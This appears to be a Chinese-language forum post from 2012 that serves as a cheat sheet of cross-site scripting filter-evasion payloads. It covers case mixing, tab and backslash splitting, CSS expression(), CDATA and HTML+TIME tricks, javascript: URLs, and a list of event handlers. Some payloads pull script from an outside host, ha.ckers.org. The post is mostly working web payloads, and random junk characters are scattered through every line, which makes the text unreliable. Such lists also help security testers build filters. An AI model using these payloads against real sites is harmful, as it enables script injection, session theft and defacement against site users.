1. 改变字符大小写
' |1 I% P0 ^! j% r
! s0 s9 X. I4 C, _3 t9 n5 ^8 Q3 @
+ w7 M- f G0 t- h3 J; V5 |, ~6 r( E/ V( H3 y1 d
<sCript>alert(‘d’)</scRipT>
- `, |. I1 s, M" B9 _1 \, B
% H( P: ^4 N! q8 m2. 利用多加一些其它字符来规避Regular Expression的检查
0 U$ v: f1 p* Q1 R' d/ x; i0 @- T5 i) t* H; z+ `! Z) V/ c2 c9 b
<<script>alert(‘c’)//<</script>
( f1 G2 I' X6 q7 Z3 @, f9 M8 I
0 v" D+ q- V0 V2 A5 j( P <SCRIPT a=">" SRC="t.js"></SCRIPT>" V: ]& [8 `. b x
1 c, P$ F9 x: X5 Y6 V0 I <SCRIPT =">" SRC="t.js"></SCRIPT>$ w1 S, m! E7 z9 a7 M& ], r
% F2 O: w8 k: `0 L <SCRIPT a=">" ” SRC="t.js"></SCRIPT>3 H1 n$ _6 N" ~5 {4 G
& t8 c- {- \& C4 N <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>0 ]2 e L Y+ \0 x
5 o7 m& q7 q" p. l
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
z8 f1 |1 O4 R: N0 C0 @$ d" {$ x! Z+ Q+ {9 i
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>: v7 N) D3 H, e& y; l9 o: S
' G1 h0 P) n q3. 以其它扩展名取代.js: K$ S% {+ |2 b7 {
5 y, b# {8 T4 L& P- k5 `0 Y2 e E <script src="bad.jpg"></script>8 w& C- U* |' q3 {( E' ^) w
, U- L+ Z! @/ \* `, C
4. 将Javascript写在CSS档里: L& J7 c0 F- F9 Z: \0 K4 s
2 ~ a# W# _: O: @: l
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
* ?9 _. b1 V$ `7 }; x9 X, H2 J
5 d. C8 s$ |0 B. D8 i" t example:
* `1 b1 W4 b! v, u
. [' m1 M9 g3 r body {
0 ]0 x/ P- m; Y/ C" X1 R& J; g' f3 f3 B% X2 c( e5 |+ v, l
background-image: url(‘javascript:alert("XSS");’)
- Z/ u- k2 p9 R+ D0 u/ k+ K/ r" I; q. q2 P* i
}
6 B( I6 H! ]+ H1 W1 ^' g9 l# n! c. v( R' z. p
5. 在script的tag里加入一些其它字符
1 ^; r3 A }- T/ T1 @0 s1 h& Y3 ]7 ]5 a) I; H2 p6 _
<SCRIPT/SRC="t.js"></SCRIPT>
" y7 e) n6 G5 y2 p7 K: H2 f+ r/ W) g9 i8 z3 C
<SCRIPT/anyword SRC="t.js"></SCRIPT>8 ^8 l, i7 ]4 K. r. x6 Z
, Q0 C7 F/ Y' `* E. d* @6 r c2 S- l/ F6. 使用tab或是new line来规避
9 R* q/ }4 J9 s' X% X" P* n2 }
" c% `; \$ j" f* |$ P# ] <img src="jav ascr ipt:alert(‘XSS3′)">4 F/ V$ i( z% v4 ]
& t. e+ i, D& t) p
<img src="jav ascr ipt:alert(‘XSS3′)">
# T& h& j2 I9 Q0 f; V5 b/ F$ n- T# S9 u, @9 r& X8 w
<IMG SRC="jav ascript:alert(‘XSS’);">
* J5 ]( T2 ]! v
, f+ }; R' l$ M. q, ~- D -> tag- y3 s+ J8 s8 U% c( C( [9 E% \
* z) X. w/ T: {5 B4 n- C1 @ -> new line
( C" W- x. m' R4 |; P5 S L$ x6 Y0 X) P
7. 使用"\"来规避
8 x1 C8 f9 W0 f9 x3 a ~" c6 W! G9 `, @/ R2 [1 p3 P
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>" m! ~2 B% ^* o% Z, g6 w( o
7 D! t: A" G2 s <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>0 ^* e; }+ z0 G9 w/ V
$ N' h/ [' g' k t6 z l" i0 }6 B, J" b) {
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">0 `; I; m+ @# A, a( c" i
- v; r+ D- g1 }
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">" N# t) e2 Z# c) V1 x) r
6 _6 p2 h2 J6 R7 p+ H
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>; G8 u ]( l2 M4 R2 A
3 Z( r; r9 S8 u' k3 b
8. 使用Hex encode来规避(也可能会把";"拿掉)1 @8 e/ r2 \& Y9 ]1 A
! t6 w: K- ~. A! x/ t
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
7 V" i+ h/ m, D9 m
* o1 t# ~+ A0 f+ v$ b9 g' Y 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">+ O. [; ]$ u; [% r7 S0 n8 H
, S; X3 b# S+ ^( V- N& O! ~9 W <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">% M6 W6 }! F/ ^ x7 g
7 g8 S+ O9 J2 r2 C: K1 G0 S
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">- M4 C2 P, F. E. E9 W! u
1 J9 I+ z( S6 i' R' ~4 v
9. script in HTML tag
& f7 n* b/ C( S2 g- w) a0 O1 C9 [# S: s6 K# Q4 U( [
<body onload=」alert(‘onload’)」>
1 \0 [7 {& C* L0 s$ j; c# @0 Y5 k
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
, o. a v7 H2 H/ j& x: a4 S5 S/ y! y. Z Z' y
10. 在swf里含有xss的code1 ] H6 [7 n4 V& Y
) {5 G6 c) J/ T0 v' [ <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>/ i% R+ J6 h3 q6 I
4 x X, d- b( z5 Q4 s11. 利用CDATA将xss的code拆开,再组合起来。
5 h4 \6 n; D4 U2 M- v
% h5 `3 r% E5 u7 Z <XML ID=I><X><C>. k6 X6 D: F" ~7 j
6 a9 M# u1 c# n( P
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
& x) L8 k" {0 i$ [: g: A5 y/ m9 w2 S2 z$ ^6 t/ \
</C></X>% p' x) K8 h% N, \% l
& I" h2 I: x/ ?* E6 p4 r( k
</xml>
) u: `! z' U3 s* Q
) i1 \. K; r* I2 q& V <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
7 l2 a0 t2 ]0 ]! _( I& u: Z
) g2 G" ], t/ E0 J5 b+ n, C; L$ e* ^: h <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
5 b+ ] x) ^3 d9 O; T5 x3 Q1 x( f7 z9 A9 x; G- f
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>, F( V6 F( }! x, d. m( h! I; p
a( Q( j: }! N) k2 S2 @& g
12. 利用HTML+TIME。
' N7 Q1 S8 J3 s& V" f6 a. L5 z1 b, r& b0 ]
<HTML><BODY>
0 @, V) h( J6 L% D( o9 v* [, V0 |) I( b3 N9 ?( z9 Z$ }8 o
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
( t9 b# ]/ g* X$ h) ]* a
) N" B) y/ A" m( w- g <?import namespace="t" implementation="#default#time2">
0 g# ~7 ?6 z j9 J9 o" @. E- e5 p4 Z: I" N
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
2 @+ }: t3 x% H. M; d: A+ h/ M1 }6 S! l7 ] b, ]* H' @. l
</BODY></HTML>
' E* v! Z* J# w! Q/ J1 G" j( y9 W* c2 o
13. 透过META写入Cookie。) R" p( K& }0 `- H
$ R7 C( @ o! Z3 e) A: O
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">/ N8 f2 @" E* F
7 t8 L" D l$ N
14. javascript in src , href , url: l! \; N) \6 P5 X0 x
' z. a7 L: K8 E6 F <IFRAME SRC=javascript:alert(’13′)></IFRAME> R4 D3 E# Q# s% M3 n4 T$ U
5 _$ `( i/ `1 x$ ]% s, I# ?0 ~" `. Z
<img src="javascript:alert(‘XSS3′)">
7 S$ q( |$ i7 D4 a, s
/ w' f5 l7 Z+ w3 }<IMG DYNSRC="javascript:alert(‘XSS20′)">' F+ x% V* b' \7 f0 f1 [
1 T5 I. S- h- o5 I0 \2 n <IMG LOWSRC="javascript:alert(‘XSS21′)">
8 [. z+ J) \) H! q: P. S* M s9 J$ I5 M0 B: |+ S. p0 _
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
, Z. C) q9 U4 D3 t# J7 ^. E% L c1 ?+ t3 T/ y' e
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>) e) D+ P: M2 X
( N! l; p7 J+ d6 v
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
1 F4 d; v, X3 \! X7 h% S3 S
/ @. o Q( L- w& X, c <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">% N. s# I! X( Q
6 z* E% _( p0 b k. ]2 ^& I <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}* X" B i* O9 y
7 A; M c. u9 S1 B6 b* v4 X9 H' y </STYLE><A CLASS=XSS></A>, G. n" M1 L7 Z P6 {
" K% S& x1 ]. p4 e, D" ~$ v+ O <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>5 o% F" E3 q Q% @, R5 a
/ d9 h$ N$ I* |% o; V8 b2 I |
发表于 2012-12-31 09:59:28
收藏
支持
反对